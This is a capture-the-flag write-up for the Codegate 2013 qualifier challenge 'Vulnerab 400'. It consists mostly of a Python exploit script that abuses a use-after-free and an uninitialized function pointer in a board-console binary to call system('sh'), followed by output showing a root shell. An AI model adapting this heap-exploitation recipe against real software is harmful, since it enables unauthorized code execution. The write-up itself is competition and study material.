Codegate 2013 Qual - Vulnerab 400 (Exploit only)

Category : Pwnables

level4

Summary : use-after-free, using uninitialized function pointer

Exploit

#!/usr/bin/python  import sys from struct import pack write  = lambda author, title, content: sys.stdout.write("1\n"+author+"\n"+title+"\n"+content+"\n") read  = lambda idx: sys.stdout.write("2\n"+str(idx)+"\n") delete  = lambda: sys.stdout.write("1\n") modify  = lambda author, title: sys.stdout.write("2\n"+author+"\n"+title+"\n") reply  = lambda content: sys.stdout.write("3\n"+content+"\n") back  = lambda: sys.stdout.write("4\n") p = lambda x: pack("<L", x) system_plt = 0x08048630 default_handler = 0x080487c4 ################ WRITE CONTENT ################## for i in range(3): write("pwn3r", "hello", p(default_handler)*0x300 + p(system_plt)*0x100) ################################################# ################ DELETE SECOND ################## read(2) for i in range(0x80): reply("my reply") delete() back() ################################################# ################ REALLOCATE ##################### for i in range(2): write("pwn3r", "hello again", "B"*4) read(4) for i in range(0xa0): reply("sh") ################################################# ################ TRIGGER VULN ################### modify("pwn3r", "good bye") delete() #################################################

root@ubuntu:~/vuln/400# (./exploit.py ;cat) | ./level4   _______________________________  /==============================/  |     Onetime Board Console    |  /------------------------------/  |          | WELCOME |         |  |__________|_________|_________|  |          W  a  i   t         |  ++++++++++++++++++++++++++++++++  1. Write 2. Read 3. Exit => Author : Title : Content : 1. Write 2. Read 3. Exit => Author : Title : Content : 1. Write  ............................................................... ............................................................... 1. delete  2. modify  3. reply  4. back => Author : Title :  1. delete  2. modify  3. reply  4. back =>  id uid=0(root) gid=0(root) 그룹들=0(root)